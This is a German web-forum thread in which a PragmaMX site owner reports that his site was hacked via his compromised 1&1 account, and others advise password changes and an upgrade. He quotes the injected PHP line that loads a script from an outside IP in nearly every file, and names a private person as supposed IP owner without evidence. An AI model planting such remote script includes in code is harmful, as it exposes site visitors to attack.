1&1 Mail gehacked und Zugriff auf Webseite

Begonnen von Biker, 08 Juli 2014, 13:07:53

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 1 Gast betrachten dieses Thema.

Biker

Hallo zusammen,
da ich leider zu den Kunden von 1&1 zähle, deren Mailaccounts gehacked wurden, hat sich jemand Zugriff auf meine Biker-Club-Webseite verschafft.

Die Seite war nicht mehr aufrufbar....nur noch eine weiße Seite.

Per FTP habe ich gesehen, dass jemand zig Dateien um fast die gleiche Uhrzeit....innerhalb weniger Minuten....verändert hat.

Nachdem ich alles versucht habe, die Seite zu retten, habe ich im Quelltext folgendes gefunden....mit dem ich nichts anfangen kann - siehe Anhang.

Da wurde immer wieder nach Aufruf meiner Domain die Verbindung zur IP 5.45.179.82 aufgebaut. (Mozilla unten links = "warte auf 5.45.179.82")
Die Recherche ergab, dass die IP einem Jan Steding aus Willich zuzuordnen ist, aber ich habe keine Ahnung wer das ist.

Gibt es ggf eine einfache Erklärung dafür?

Ich werde bei dieser Gelegenheit direkt auf V2 umstellen.....aber mich ärgert das ungemein.

Gruß
Bernd
Detektei Martin - wir bringen Licht ins Dunkle!

Biker

Das mit dem V2 lass ich dann doch lieber erstmal.....muss ich mich erst einmal reinarbeiten.....denn da kann ich ja anscheinend das Theme nicht mehr nutzen.

Ich werde dann jetzt alles neu installieren und von vorne anfangen.

Wenn ich nur wüsste, wo ich nach diesem script suchen muss, dass sich immer mit dieser IP 5.45.179.182 verbinden will....ich finde es nicht.

Detektei Martin - wir bringen Licht ins Dunkle!

Biker

Gibt es ein Programm, mit dem man zig php-Dateien automatisch mit einem script versehen kann?
Wenn ja, müsste es ja auch umgekehrt möglich sein, um alle Einträge wieder zu entfernen.

Ich habe die Einträge jetzt zB. in allen Language-Dateien - jeweils am Ende - gefunden:

?><?php echo "<script src=\"http://5.45.179.182/script.php\">
</script>"

Detektei Martin - wir bringen Licht ins Dunkle!

Biker

Hm....lebt hier noch jemand?  :gruebel:

Fast in jeder Datei des Pragma war das eingebaut....

?><?php echo "<script src=\"http://5.45.179.182/script.php\">
</script>"


Gibt es ggf. ein Programm, mit dem ich das alte System bereinigen kann, da es manuell ewig dauern würde, all diese Einträge zu bereinigen.
Detektei Martin - wir bringen Licht ins Dunkle!

Biker

Habe ich irgendwas verbrochen, oder warum wird mein Posting hier total ignoriert?
:gruebel: :gruebel: :gruebel:
Detektei Martin - wir bringen Licht ins Dunkle!

Fokuna2

Anscheinend sind hier momentan,
alle zu beschäftigt.
Der PragmaMX - Kern Team, ist schon lange nicht mehr
erschienen. Bzw. hat was zu PragmaMx 2.0 geschrieben.

Mit ihrer Realen (lohn) Arbeit.
Du muss bedenken, das diese nur ein Freizeitprodukt ist.
Mir dauert, die Entwicklung des System auch ein wenig zu lang. Aber
ich habe leider noch kein so gut verständliches gefunden.

Sie müssen auch mal Geld verdienen.




Mit freundlichen Grüßen
Thomas
Neue Daten:
Mysql: 8.0.28-19
PHP-Version: 7.4 ->8.0.x

Biker

Dafür habe ich vollstes Verständnis, aber da oben steht "Gelesen 174 mal"....

Naja...egal...ich komm schon irgendwie klar....bin ja nicht erst seit gestern damit beschäftigt.
Detektei Martin - wir bringen Licht ins Dunkle!

Olaf

Hi Biker,

sorry für das delay  :pardon: habe den Thread nicht gesehen...

normalerweise kann die Änderung der PHP-Dateien nur per FTP erfolgen. Auch ein JS müsste per FTP auf den Server zugreifen um sowas zu machen...

Habe das bei einem anderen Hack auch schon so erlebt....

Erstmal alle Passwörter ändern, wenn möglich, auch von der SQL-DB (wirst du eh schon gemacht haben....)

Bei einer Umstellung auf pmx2 solltest du dein altes Theme weiter benutzen können, wenn keine eigenen größeren Änderungen am Theme vorgenommen wurden, welche sich auf das System auswirken. Ansonsten kann ich dir auch bei der Anpassung des Themes (oder eines neuen) helfen.




g

Olaf

Kein Support über PN, Mail etc.!
Bitte die Fragen im Forum stellen, nur so helfen die Antworten auch den anderen Usern.
Bitte auch die Boardsuche nicht vergessen, oft ist genau dein Problem schon an anderer Stelle gelöst worden!

Biker

Moin Terra!
Danke Dir, ja...hab ich alles schon geändert.

Dank 1&1 (Kontrollcenter) hatte derjenige vollen Zugriff auf alles!
Habe alles geändert und auch keine Admin-Mail mehr verwendet, die zu 1&1 gehört.

Das mit 2.0 hört sich verdammt gut an!

Dann werde ich das doch in Angriff nehmen! Feine Sache!
Ich würde nämlich gerne das greatcarbon weiterhin benutzen.

Bis demnächst dann mal!

Lieben Gruß
Bernd
Detektei Martin - wir bringen Licht ins Dunkle!

Biker

Wow...ich bin begeistert!
Habe jetzt auf 2.0 umgestellt und es gefällt mir sehr gut!

SUPER ARBEIT!  :thumbup: :thumbup: :thumbup:
....und das Theme greatcarbon läuft!

Super Sache!  :thumbup: :thumbup: :thumbup:
Detektei Martin - wir bringen Licht ins Dunkle!